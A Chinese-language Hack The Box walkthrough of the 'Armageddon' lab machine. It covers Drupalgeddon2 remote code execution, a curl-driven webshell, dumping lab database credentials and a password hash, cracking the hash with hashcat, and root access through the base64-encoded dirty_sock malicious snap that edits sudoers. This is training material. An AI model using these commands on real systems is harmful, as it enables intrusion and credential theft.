HTB 学习笔记

【Hack The Box】Linux练习-- Armageddon

---

🔥系列专栏：Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间：🌴2022年11月27日🌴
🍭作者水平很有限，如果发现错误，还望告知，感谢！

信息收集

22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Welcome to  Armageddon |  Armageddon

Drupal 7,有远程命令执行漏洞
CHANGELOG.txt 应该有版本信息

而关于他我同样找到了一个
https://github.com/dreadlocked/Drupalgeddon2
这个显得方便阅读

要先进行这一步，不然会报错

sudo gem install highline

但是这只是一个很没用的webshell
看到最后一行
[i] Fake PHP shell: curl ‘http://10.129.18.204/shell.php’ -d ‘c=hostname’

我们模仿他写curl语句
curl ‘http://10.129.18.204/shell.php’ -d ‘c=id’

但我用尽了各种办法，都不能反弹shell
我也不知道为什么
我已经try hard了

那我们就直接在这个不得行的websehll中寻找
作为一个webshell，我们应该在/var下面仔细搜索

ls /var/www/html/sites/default -la

cat /var/www/html/sites/default/settings.php 

$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupal',
      'username' => 'drupaluser',
      'password' => 'CQHEy@9M*m23gBVj',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);
...

获得了一个数据库的账号密码

whereis mysql 
【判断是否存在mysql

所以我将登陆他

mysql -u drupaluser -pCQHEy@9M*m23gBVj

不愧是废shell
不过我也找到了解决办法

mysql -u drupaluser -pCQHEy@9M*m23gBVj -e 'show databases;'

加上-e直接输出结果

ok,we got it

mysql -u drupaluser -pCQHEy@9M*m23gBVj -e 'use drupal; select * from users'

id     name    pass    mail    theme   signature       signature_format   created  access  login   status  timezone        language        picture initdata
0                                               NULL    0       0       0  0NULL            0               NULL
1       brucetherealadmin       $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt     admin@armageddon.eu                     filtered_html   1606998756  1607077194      1607076276      1       Europe/London           0  admin@armageddon.eu      a:1:{s:7:"overlay";i:1;}

得到密码

$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt

在列表中检索，得知应该采用7900

hashcat -m 7900 drupal.hash /usr/share/wordlists/rockyou.txt

得到凭据如下
brucetherealadmin:booboo

提权

sudo -l

/usr/bin/snap install *
snap version命令显示安装的版本 snap 和 snapd 成为 2.47.1-1.e17.
根据
https://gtfobins.github.io/gtfobins/snap/

恶意快照包

https://shenaniganslabs.io/2019/02/13/Dirty-Sock.html

cd /dev/shm/

这就是一个恶意快照包

python -c 'print "aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD//xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAerFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUjrkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAAAAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw" + "A" * 4256 + "=="' | base64 -d > exploit.snap

sudo /usr/bin/snap install --devmode exploit.snap
su dirty_sock
dirty_sock
sudo -i